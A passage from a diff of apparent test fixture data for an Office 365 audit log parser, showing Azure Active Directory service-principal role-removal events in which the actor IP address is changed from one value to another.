"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -11122,9 +11122,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:00", "ExtendedProperties": [ { @@ -11358,7 +11358,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -11388,9 +11388,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -11624,7 +11624,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 